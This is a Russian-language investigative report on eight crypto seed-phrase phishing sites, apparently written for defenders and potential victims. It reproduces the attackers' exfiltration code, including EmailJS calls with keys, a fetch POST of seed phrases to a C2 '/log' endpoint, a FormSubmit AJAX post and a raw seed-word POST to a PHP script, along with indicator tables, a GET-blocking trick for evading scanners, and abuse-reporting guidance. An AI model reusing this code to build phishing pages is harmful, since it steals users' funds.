Editorial mirrorBrand mentions redacted to public IDs. Hover to inspect. Everything else is theatre.How it works
THE ENABLERS REGISTRYRegistrar accountability archive
Archive LiveRead-only public record · No ads · No tracking
Case file folder with redacted documents and confidential investigation report.
CASE / RU / PHISHING ANATOMY

8 программ для кражи семенных фраз: результаты реверс-инжиниринга

The Enablers Registry·Editorial mirror·/ru/phishing-anatomy

Public record copy. Brand names withheld, public accreditation numbers preserved. If the body below says “we”, that means the original publisher, not this mirror. TER only preserves, redacts, and re-contextualizes.

Анатомия криптовалютного фишинга:
Анализ 8 реальных атак

Мы перехватили фишинговый трафик в режиме реального времени, провели реверс-инжиниринг пяти программ, предназначенных для кражи семенных фраз, и отследили похищенные данные до ботов в [REDACTED], учетных записей EmailJS и бэкендов сервисов «фишинг как услуга».

27 марта 2026 года Исследование THE ENABLERS REGISTRY Время чтения: 18 минут
Анализ расследования случая криптофишинга
Анализ перехваченного фишингового трафика в режиме реального времени позволяет выявить всю инфраструктуру атаки
8Проанализированные сайты
7Методы вывода данных
1,824+Украденные учетные данные
380+Бренды кошельков
$0Стоимость атаки

Что мы обнаружили

Каждый день тысячи пользователей криптовалют теряют свои средства из-за фишинговых сайтов, которые внешне ничем не отличаются от легальных сервисов кошельков. Но что происходит позади Поддельная кнопка «Connect Wallet»? Куда на самом деле попадает ваша семенная фраза?

Мы перехватили актуальный HTTP-трафик с пяти действующих фишинговых сайтов, скачали их полный исходный код и отследили каждый конечный пункт передачи данных до его конечного пункта назначения. Это расследование раскрывает всю структуру современного криптофишинга — от приёмов социальной инженерии, заставляющих вас ввести свою семенную фразу, до бота в [REDACTED], который передаёт её злоумышленнику в режиме реального времени.

Отказ от ответственности

Все семенные фразы, приведенные в данной статье, являются тестовыми данными, сгенерированными случайным образом. В ходе данного расследования не произошло утечки реальных учетных данных. О всех сайтах было сообщено их соответствующим хостинг-провайдерам и отделам по борьбе со злоупотреблениями.

Универсальная схема атаки

Несмотря на различия в брендинге и внутренней инфраструктуре, все 8 фишинговых сайтов следуют абсолютно такая же психологическая воронка:

Целевая страницаУкрепление доверия
Выбор кошелька60–110+ логотипов
Ложное сообщение «Подключение...»Таймер на 3–5 секунд
«Ошибка подключения»Всегда завершается сбоем
Ввод данных вручнуюСемечко / Ключ / Хранилище ключей
ЭксфильтрацияTG / Электронная почта / API

Ключевая мысль: анимация «Подключение...» всегда запрограммировано на сбой. В исходном коде сайта № 4 мы обнаружили const success = false — попытка подключения кошелька не предпринимается. Весь этот процесс предназначен исключительно для того, чтобы подтолкнуть жертв к заполнению формы «Подключиться вручную».

Цепочка криптофишинговой атаки из шести этапов
Универсальная цепочка атак из 6 этапов, характерная для всех проанализированных нами фишинговых сайтов

8 объектов: полная разбивка

1
Протокол сетевого уровня
[REDACTED]
В прямом эфиреIANA #1910 PagesБот в [REDACTED] + EmailJS

Выдача себя за другого человека

Вымышленный «децентрализованный протокол» для проверки кошельков. Для обеспечения достоверности используются актуальные тикеры цен от CryptoCompare и ссылки на реальные блокчейн-браузеры (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano). На целевой странице представлены более 100 логотипов кошельков и описан процесс «проверки», состоящий из 3 этапов.

Двойная цепочка вывода информации

Самый сложный бэкенд из всех пяти — каждый украденный набор учетных данных проходит через два независимых канала одновременно:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on [REDACTED]
  |      |
  |      +--> [REDACTED] Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

Результаты анализа OSINT

ПоказательЗначение
Письмо от мошенникаBestgrace309@gmail.com
Бот в [REDACTED]@DewdropsTG_bot (ID: 7567323692)
Получатель в [REDACTED]@metatech2 (Идентификатор в чате: 7350941887)
Бэкенд[REDACTED]
Сервис EmailJSservice_d5qigxs / template_7bqxeaa
Скрытый доменlayerschain.in (из обфускации адреса электронной почты CF)
Отправленные сообщения1 824+ (по идентификатору сообщения в [REDACTED])
Возраст домена2 дня (TLS: 25 марта 2026 г.)
Нарушение требований оперативной безопасности (OPSEC)

Адрес электронной почты злоумышленника был обнаружен в Комментарий на JavaScript внутри config.js: // Bestgrace309@gmail.com. Они забыли удалить его перед развертыванием. Кроме того, бэкенд ретранслятора [REDACTED] полностью открыт — без аутентификации и без ограничения скорости. При декодировании данных IANA #1910 data-cfemail помимо обфускации в HTML-коде, мы также обнаружили скрытый адрес электронной почты: support@layerschain.in, подключаясь к индийской и южноафриканской хостинговой инфраструктуре.

2
Миграция токенов AQLA
[REDACTED]
В прямом эфиреIANA #1910 PagesНестатические формы

Выдача себя за другого человека

Идеальное до пикселя воспроизведение реальности Aqualibre (AQLA) страница миграции токенов. В коде HTML содержится тег метаданных, указывающий на источник: data-scrapbook-source="https://token.[REDACTED]/migration", с датой 19 ноября 2024 года.

Подход «Zero-Code»

Для этого атакующего необходимо полное отсутствие кода на стороне сервера. Форма отправляет данные непосредственно на Нестатический — легитимный бэкенд формы для статических сайтов. Каждая отправленная форма перенаправляется на электронную почту мошенника. Адрес электронной почты злоумышленника — никогда не отображается в исходном коде.

<form action="https://forms.[REDACTED]/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Стоимость: 0 долларов

IANA #1910 Pages: бесплатно. Un-static Forms: бесплатно. Домены не приобретались. Серверы не арендовались. Общая стоимость инфраструктуры: ноль долларов.

3
[REDACTED] Typosquat
[REDACTED]
В прямом эфире IANA #1910 Pages Нестатические формы

Выдача себя за другого человека

Субдомен содержит «safpal» — это намеренная орфографическая ошибка в слове [REDACTED], популярный аппаратный кошелек. Сайт маскируется под «Blockchain Wallet Rectification» и содержит 26 поддельных категорий проблем. Для анимации названий блокчейнов (Ethereum, BSC, Polygon…) используется библиотека Typed.js, а для придания сайту достоверности — тикер LiveCoinWatch.

Тот же комплект, тот же оператор?

Использует абсолютно такой же шаблон фишингового письма как объект № 2: идентичный connect.html, идентичный wallets.html с более чем 60 логотипами, на одном и том же бэкенде Un-static (с разными идентификаторами форм — 6f1b82c3...da9943af). Наличие идентичного набора явно указывает на то, что один оператор, обслуживающий оба сайта.

Ошибки в коде: «Privay Policy» (пропущена буква «c»), «seperated» (должно быть «separated»), «Kestore» (пропущена буква «y»). В поле для ввода пароля используется type="text" вместо type="password".

4
Клон сети Flare
[REDACTED]
В прямом эфиреIANA #1910 PagesДвойной EmailJS (резервирование)

Выдача себя за другого человека

Практически идеальный клон Сеть Flare portal — настоящий блокчейн EVM уровня 1 с протоколами FTSO и Data Connector. Включает в себя более 30 партнёров экосистемы, навигацию и брендинг. Фавиконы загружаются с домена, зарегистрированного по методу «типосквот»: [REDACTED] (в слове «mainnet» пропущено одно «n»).

Двойное резервирование EmailJS

Единственный сайт, на котором используется две отдельные учетные записи EmailJS одновременно для обеспечения отказоустойчивости в случае попытки ликвидации:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.[REDACTED]/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

Тема письма по каждому случаю кражи: "New Wallet Details from Flare".

Это финансируемое предприятие

HTML-код содержит Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Защита от PPC от Lunio, и Пиксель Twitter/X Ads. Злоумышленник запустил платная реклама чтобы привлечь жертв на фишинговый сайт и отфильтровать клики ботов. Это не хобби — это финансируемая операция с аналитикой и рекламными расходами.

Фишинговый сайт сети Flare Network с использованием EmailJS и платной рекламы
Сайт № 4: платная реклама, аналитический мониторинг и двойной вывод данных — самая профессиональная операция
5
COIN NODE / Исправление в кошельке (PhaaS)
[REDACTED]
Бэкенд не работаетAPI PulseResolve (PhaaS)

Выдача себя за другого человека

Универсальный сервис «COIN NODE» / «Wallet Fix» (без указания конкретной марки). Авторские права «Wallet Fix 2022» — этому шаблону набора уже не менее 4 лет. Изображения размещены на [REDACTED] (WordPress на AWS).

«Фишинг как услуга»

Самая тревожная архитектура бэкенда: а Многопользовательский API на основе UUID:

POST https://api.[REDACTED]/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=[REDACTED]&type=phrase&phrase=buddy+surprise+vapor+river+...

Каждому мошеннику присваивается собственный конечный пункт с UUID. Центральный оператор обслуживает API, отслеживает кампании и, возможно, получает долю от похищенных средств. Это организованное хищение криптовалюты — модель «фишинга как услуги».

Связанная инфраструктура (почти не функционирует)

ДоменРольСтатус
[REDACTED]API для экфильтрации данныхNXDOMAIN
[REDACTED]Хостинг фавиконовNXDOMAIN
[REDACTED]Хостинг логотиповNXDOMAIN
[REDACTED]CDN для изображенийВ режиме реального времени (AWS)
Zombie Frontend

Бэкенд не работает, но фронтенд по-прежнему работает на IANA #1910 Pages. Если злоумышленник повторно зарегистрирует [REDACTED], сайт сразу же возобновляет работу.

6
Центр поддержки + Восстановление реестра
[REDACTED] и [REDACTED]-recovery.support
В прямом эфиреIANA #1910 Pages + ReplitПользовательский API C2Автозаполнение BIP39

Выдача себя за другого человека

A двухстороннее мероприятие: общий «Центр поддержки» по адресу [REDACTED] с 15 вымышленными категориями выпусков и 39 брендами кошельков, а также Идеально точный клик-по-клику клон процесса регистрации в [REDACTED] в [REDACTED]-recovery.support размещенный на Replit — с возможностью выбора модели устройства, настройки PIN-кода и сеткой из 24 слов начальной фразы с настоящее автозаполнение BIP39.

Бэкэнд C2 для защиты от сканеров

Страница поддержки кошелька отправляет похищенные данные на [REDACTED]/log — настраиваемый сервер управления (C2) на базе nginx/Ubuntu, работающий за IANA #1910. Бэкенд намеренно отклоняет все запросы GET (возвращает ошибку 522 «таймаут»), отвечая только на запросы POST. Это означает, что сканеры URL-адресов, роботы Google Safe Browsing и исследователи в области безопасности, отправляющие запросы GET на этот конечный пункт, ничего не видят — сервер C2 выглядит неактивным.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.[REDACTED]",
  allowedWallets: ["[REDACTED]","solfare","[REDACTED]","[REDACTED]",
    "[REDACTED]","[REDACTED]","[REDACTED]","VARA Provisional License","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

Клон [REDACTED] запускает отдельный бэкенд на Express.js непосредственно на Replit: POST /api/recovery-phrase сбор {deviceId, pin, phrase}. Он возвращает 400 {"error":"Invalid data provided"} при некорректных входных данных — подтверждая, что бэкенд работает и проходит активную валидацию украденные данные.

Результаты анализа OSINT

ПоказательЗначение
Фронтенд (кошелек)[REDACTED]
Фронтенд ([REDACTED])[REDACTED]-recovery.support (34.111.179.208)
C2 Бэкенд [REDACTED] → nginx/1.24.0 Ubuntu
IP-адреса C2104.21.60.163 / 172.67.198.35 (IANA #1910)
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736
Регистратор[REDACTED] ([REDACTED]-recovery.support)
Развернуто9 января 2026 г. (заголовок «Last-Modified»)
Технологический стек React + Vite + Tailwind v4.1 + Framer Motion
Максимальная точность воспроизведения пользовательского опыта

Пакет JS объемом 466 КБ содержит полный список слов BIP39 при автозаполнении в режиме реального времени: 67 упоминаний термина «passphrase» и 39 — «mnemonic». Клон [REDACTED] предлагает жертвам пройти точно такой же процесс настройки, как и на подлинном устройстве [REDACTED] — это самая убедительная фишинговая страница за всё время данного расследования. apiKey поле в конфигурации предполагает, что многопользовательская архитектура PhaaS.

7
Децентрализованная платформа для запуска проектов
[REDACTED]
В прямом эфиреIANA #1910 PagesFormSubmit.co

Выдача себя за другого человека

Универсальная «децентрализованная платформа запуска» с 21 категория приманок (стейкинг, миграция, KYC, розыгрыши, получение вознаграждений, восстановление активов, предпродажа, чеканка NFT, заблокированные аккаунты...) и Более 70 брендов кошельков — один из самых полных списков кошельков, с которыми нам доводилось сталкиваться. Характерная опечатка «Sychronize» (пропущена буква «n») выдаёт подделку.

Конвейер FormSubmit

Области применения FormSubmit.co — легальный сервис для отправки форм по электронной почте. Хеш конечной точки a2cf4131f1a5d39453c7c183df96f86f представляет собой MD5-хэш адреса электронной почты мошенника. Мы провели перебор сотен шаблонов адресов электронной почты в сервисах Gmail, Yahoo, Hotmail, ProtonMail, Yandex и [REDACTED]не найдено. Мошенник использует необычный или сгенерированный случайным образом адрес электронной почты.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

Результаты анализа OSINT

ПоказательЗначение
Домен[REDACTED]
Хеш FormSubmita2cf4131f1a5d39453c7c183df96f86f
Идентификатор кампанииDAPP — ДЕЦЕНТРАЛИЗОВАННОЕ ПРИЛОЖЕНИЕ
Набор FontAwesomebdc3291137 (комплект № 112310842, бесплатная версия 6.7.2)
jQuery3.2.1 + 3.5.1 загружены одновременно
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (несовместимость)
Две ручки для переноски

Набор FontAwesome bdc3291137 — FontAwesome может определить владельца учетной записи, связанной с этим идентификатором набора. Тег кампании DAPP DECENTRALIZED может появиться на других фишинговых сайтах, использующих тот же хеш FormSubmit. После кражи семенной фразы, поддельный QR-код и случайный 7-символьный референсный код отображается сообщение: «Обратитесь к администратору, указав свой уникальный реферальный код» — заставляя жертв ждать, вместо того чтобы проводить расследование.

8
R2 Bucket + PHP на домашнем компьютере
pub-519769e9eb634616b1746c2018641d56.r2.dev
МертвыйIANA #1910 R2PHP + DDNS

Выдача себя за другого человека

Неизвестно — и фронтенд, и бэкенд находятся в автономном режиме. Судя по структуре полезной нагрузки, речь шла о программе, похищающей семенную фразу криптокошелька. Это Общедоступный хранилище IANA #1910 R2 (объектное хранилище, а не Pages) — это хорошо задокументированный вектор фишинга по данным Netskope, было выявлено более 5 000 вредоносных страниц, а объем трафика вырос в 61 раз.

Настройка для «скрипт-кидди»

Самый примитивная операция в этом наборе. Фразы-семена отправляются слово за словом к скрипту PHP, запущенному на домашнем компьютере или VPS, подключенном через бесплатный динамический DNS:

POST [REDACTED]/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

Результаты анализа OSINT

ПоказательЗначение
Фронтенд pub-519769e9eb634616b1746c2018641d56.r2.dev [ОФЛАЙН]
Бэкенд [REDACTED] [NXDOMAIN]
Идентификатор ведра R2519769e9eb634616b1746c2018641d56
Провайдер DDNS [REDACTED] / [REDACTED] (Цинциннати, штат Огайо)
DNS NSns10–[REDACTED]
Имя пользователяmercifuljigga4real123
Имя пользователя OSINT: mercifuljigga4real123

«Merciful» + «jigga» (прозвище Джей-Зи) + «4real» + «123» — явно личный ник, указывающий на приверженность хип-хоп-культуре. Не найдено на любой платформе, индексируемой поисковыми системами: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch или [REDACTED]. Вероятно, активен в [REDACTED], [REDACTED] или на игровых платформах под этим именем или его близкими вариантами. Имя файла fuc.php соответствует дерзкому стилю ручки.

7 способов кражи вашей семенной фразы

Сравнение четырёх методов фишинга и похищения данных в криптовалютной сфере
Семь различных архитектур эксфильтрации данных, используемых на 8 фишинговых сайтах
МетодСайтыКак это работаетСкоростьСтоимость
Бот в [REDACTED]#1 Express.js на [REDACTED] использует прокси-сервер для подключения к Bot API. Мошенник мгновенно получает личное сообщение с учетными данными. В режиме реального времени$0
EmailJS#1, #4 JavaScript на стороне клиента отправляет данные напрямую в API EmailJS, который доставляет их на электронную почту мошенника. ~1 мин$0
Нестатические формы#2, #3 Стандартная HTML-форма с отправкой данных методом POST на легитимный сервис обработки форм, который пересылает отправленные данные по электронной почте. ~1 мин$0
FormSubmit.co#7 jQuery AJAX на FormSubmit.co. Адрес электронной почты скрыт за хешем MD5. Кампания помечена тегом «DAPP DECENTRALIZED». ~1 мин$0
Пользовательский API C2#6 [REDACTED] отправляет запросы к API nginx/Express, расположенному за IANA #1910. Отбрасывает запросы GET (522) для обхода сканеров. Отвечает только на запросы POST. В режиме реального времени~5 долларов в месяц
PHP + DDNS#8 PHP-скрипт на домашнем компьютере через бесплатный динамический DNS ([REDACTED]). Фраза-семена отправляется слово за словом. В режиме реального времени$0
API PhaaS#5 Многопользовательский API на основе UUID. Центральный оператор управляет бэкендом, а мошенники арендуют конечные точки. В режиме реального времениНеизвестно

7 тревожных признаков, по которым можно распознать любой фишинговый сайт

Если вы увидите любой Если вы обнаружили что-либо из перечисленного, немедленно закройте вкладку:

1. Сообщение «Сбой подключения» — это всегда подделка

Настоящие подключения к кошелькам осуществляются с помощью протокола WalletConnect или браузерных расширений. При этом никогда не появляется ошибка «Сбой подключения», требующая ввести семенную фразу.

2. 50–110+ логотипов кошельков — всё в одном месте

Каждый значок кошелька ведёт к одной и той же форме. Настоящий сервис интегрировал бы собственный SDK каждого кошелька.

3. «Ошибка» после отправки

Поддельная «Ошибка 503» или «Неизвестная ошибка», появляющаяся после отправки, является преднамеренной. Ваши данные уже были похищены — эта ошибка заставляет вас повторить попытку, используя другой кошелек.

4. Размещено на .pages.dev

Все 5 сайтов злоупотребляют бесплатным тарифом IANA #1910 Pages. Проверка личности не требуется. В 2025 году количество случаев фишинга с использованием IANA #1910 Pages выросло на 198 %.

5. Три вкладки: «Фраза» / «Личный ключ» / «Хранилище ключей»

Ни одна легитимная служба не требует всех трёх типов учетных данных. Эта форма с тремя вкладками — характерный признак фишингового набора.

6. Отсутствие взаимодействия с блокчейном

Ни один из этих сайтов не загружается ethers.js, web3.js, или выполнять какие-либо RPC-вызовы. Это просто HTML-формы, маскирующиеся под децентрализованные приложения (dApps).

7. Инфраструктура с нулевыми затратами

Бесплатный хостинг + бесплатные формы + бесплатный обмен сообщениями = полноценная фишинговая операция за 0 долларов. Если у сайта нет настоящего домена, будьте настороже.

Полная таблица IOC

Для служб безопасности, платформ аналитики угроз и лиц, сообщающих о злоупотреблениях:

Домены и инфраструктура

ДоменТипСтатус
[REDACTED]Фронтенд для фишингаВ прямом эфире
[REDACTED]Фронтенд для фишингаВ прямом эфире
[REDACTED]Фронтенд для фишингаВ прямом эфире
[REDACTED]Фронтенд для фишингаВ прямом эфире
[REDACTED]Фронтенд для фишингаВ прямом эфире
[REDACTED]Бэкенд реле TGВ прямом эфире
[REDACTED]Ресурсы, связанные с типосквотингомНеизвестно
layerschain.inСвязанный доменDNS не работает
[REDACTED]Бэкенд PhaaSNXDOMAIN
[REDACTED]Хост активовNXDOMAIN
[REDACTED]Хостинг логотиповNXDOMAIN
[REDACTED]CDN для изображенийВ режиме реального времени (AWS)
[REDACTED]Фронтенд для фишингаВ прямом эфире
[REDACTED]-recovery.supportФишинг с использованием кошелька (Replit)В прямом эфире
[REDACTED]Бэкенд C2 (nginx/Ubuntu)В прямом эфире
[REDACTED]Коренной домен404
[REDACTED]Фронтенд для фишингаВ прямом эфире
pub-519769e9eb634616b1746c2018641d56.r2.devФишинг (категория R2)В автономном режиме
[REDACTED]PHP-бэкенд (DDNS)NXDOMAIN

Учетные записи и идентификаторы

ТипЗначениеСайт
Электронная почтаBestgrace309@gmail.com#1
Электронная почта (скрыта)support@layerschain.in#1
Бот в [REDACTED]@DewdropsTG_bot (7567323692)#1
Пользователь [REDACTED]@metatech2 (7350941887)#1
EmailJS № 1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS № 2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS № 3service_isy47de / JsVEgXVcaSTro1etu#4
Нестатическая формаc78173e2d991...94c3f76#2
Нестатическая форма6f1b82c3ce55...da9943af#3
UUID PhaaSa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
Экземпляр рендерингаrndr-id: ed83576e-b1b3-4c82#1
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736#6
MD5-хаш формы отправкиa2cf4131f1a5d39453c7c183df96f86f#7
Теги кампанииDAPP — ДЕЦЕНТРАЛИЗОВАННОЕ ПРИЛОЖЕНИЕ#7
Набор FontAwesomebdc3291137 (комплект № 112310842)#7
Идентификатор ведра R2519769e9eb634616b1746c2018641d56#8
Имя пользователя/DDNSmercifuljigga4real123#8

Куда сообщать о криптовалютном фишинге

Куда сообщать о фишинговых сайтах, связанных с криптовалютами — многовекторная ликвидация их
Одновременное воздействие на хостинг, бэкенд-сервисы и платформы обмена сообщениями для максимального ускорения ликвидаций
СервисО чём следует сообщатьКак
IANA #19107 контейнеров .pages.dev + 1 контейнер R2abuse.IANA #1910.com
Google Safe BrowsingВсе фишинговые URL-адресаСообщить о фишинге
PhishTankВсе URL-адреса для списка заблокированных пользователей сообщества[REDACTED]
EmailJS3 учетные записи, подвергшиеся злоупотреблению (идентификаторы сервиса указаны выше)abuse@emailjs.com
Нестатический2 конечные точки формыСвязаться через [REDACTED]
[REDACTED]Бэкенд ретранслятора [REDACTED]Отправить форму о нарушении
[REDACTED]@DewdropsTG_bot + @metatech2[REDACTED].org/support
Google (Gmail)Bestgrace309@gmail.comСообщить о нарушении в Google
Twitter/XРекламный аккаунт для продвижения сайта № 4X: Сообщить о нарушении в рекламе
FormSubmit.coХеш a2cf4131... (#7)Отправить форму о нарушении
Replit[REDACTED]-recovery.support (#6)Сообщить о нарушении правил Replit
[REDACTED]Регистратор сайта [REDACTED]-recovery.supportОтдел по борьбе со злоупотреблениями [REDACTED]
DNSExit[REDACTED][REDACTED]: злоупотребление
FontAwesomeНабор bdc3291137 (#7)Злоупотребление FontAwesome
ChainabuseВсе фишинговые кампании[REDACTED]

Как защитить себя

Золотое правило

Ни один надежный сервис никогда не попросит вас ввести вашу семенную фразу на веб-сайте. Фразы-семена вводятся исключительно в официальное программное обеспечение кошелька при его восстановлении — ни в коем случае не на сторонних сайтах, предлагающих услуги «проверки», «синхронизации» или «восстановления».

Перед подключением любого кошелька:

  • Убедитесь, что URL-адрес соответствует официальному домену. Проверьте данные SSL-сертификата.
  • Настоящий WalletConnect использует QR-код или глубокую ссылку — но ни в коем случае не форму с семенной фразой.
  • Если «подключение не удалось» и вам предложено ввести учетные данные вручную — это фишинг.
  • Проверьте подозрительные URL-адреса на PhishTank или VirusTotal перед тем, как начать взаимодействие.
  • Используйте аппаратный кошелек — он требует физического подтверждения каждой транзакции.
  • Добавляйте в закладки официальные URL-адреса. Ни в коем случае не переходите по ссылкам из рекламных объявлений, личных сообщений или социальных сетей.

Таксономия криптофишинга

Программы, похищающие семенные фразы, — это лишь одна из категорий. Вот полная картина криптофишинга — в дальнейшем мы будем публиковать подробные обзоры по каждому типу.

Программы для кражи семенных фраз
Поддельные страницы «Connect Wallet», которые заставляют вас ввести фразу восстановления. В центре внимания этой статьи — подробный анализ 5 реальных примеров.
Об этом говорилось выше
Узурпация одобрения
Вредоносные децентрализованные приложения (dApps), которые запрашивают неограниченное разрешение на расходование токенов через [REDACTED]. После получения разрешения злоумышленник опустошает ваш кошелек, не нуждаясь в вашей семенной фразе.
Скоро
«Ледовой фишинг» (Permit2)
Использует уязвимость, связанную с разрешениями EIP-2612, не требующими затрат газа. Жертва подписывает внецепочечное сообщение, предоставляющее права на передачу токенов — до момента вывода средств в цепочке не видно никакого подтверждения.
Скоро
Ложные заявления об аирдропах
Поддельные аирдропы токенов, для получения которых требуется «оформление» через вредоносный смарт-контракт. Транзакция по оформлению на самом деле приводит к переводу ваших реальных токенов.
Скоро
Программы, перехватывающие содержимое буфера обмена
Вредоносное ПО, которое отслеживает содержимое вашего буфера обмена и незаметно заменяет скопированные адреса кошельков на адрес злоумышленника перед вставкой.
Скоро
Опыление + Отравление
Незначительные транзакции с похожих адресов загрязняют вашу историю. Жертва копирует поддельный адрес из истории транзакций для своего следующего перевода.
Скоро

Неприятная правда

Стоимость организации криптовалютной фишинговой атаки $0 и занимает менее 30 минут. Бесплатный хостинг, сервисы для создания форм, бесплатные боты для обмена сообщениями. Злоумышленник, стоящий за сайтом № 1, уже похитил учетные данные из 1 824+ пострадавших. Участок № 4 работает платная реклама в полном масштабе. Это не любительские забавы — это целая индустрия. Единственная защита — это осведомленность.

Помогите нам дать отпор

THE ENABLERS REGISTRY отслеживает и сообщает о криптовалютных фишинговых сайтах в режиме реального времени. Если вы наткнулись на подозрительный сайт, сообщите нам об этом — мы расследуем ситуацию и приложим все усилия, чтобы его закрыли.

Связанные расследования

Расследование
Конец [REDACTED]: IANA #1479 солгала, чтобы защитить вора с буквой «М»
10-летняя история кражи Monero. В деле участвовали 3 регистратора. IANA #1479 выдумала 7 лживых утверждений.
Подробный анализ
Сети «Crypto Drainer»: раскрытие инфраструктуры
Как в рамках модели «дрейнер как услуга» осуществляется совместное использование инфраструктуры и операторов.
Панель открыта
Панель фишинга [REDACTED]: полный административный доступ
Нам удалось получить доступ к панели администратора фишинговой операции, связанной с [REDACTED].
Инфраструктура
Разоблачение инфраструктуры мошенничества: общие бэкенды
Как мошеннические проекты совместно используют серверы, шаблоны и схемы оплаты.

Continue browsing the ledger

This page is the editorial mirror. Brand names are redacted to public IANA / business identifiers. Use the index to navigate other case files.

Open registrar ledger → All briefings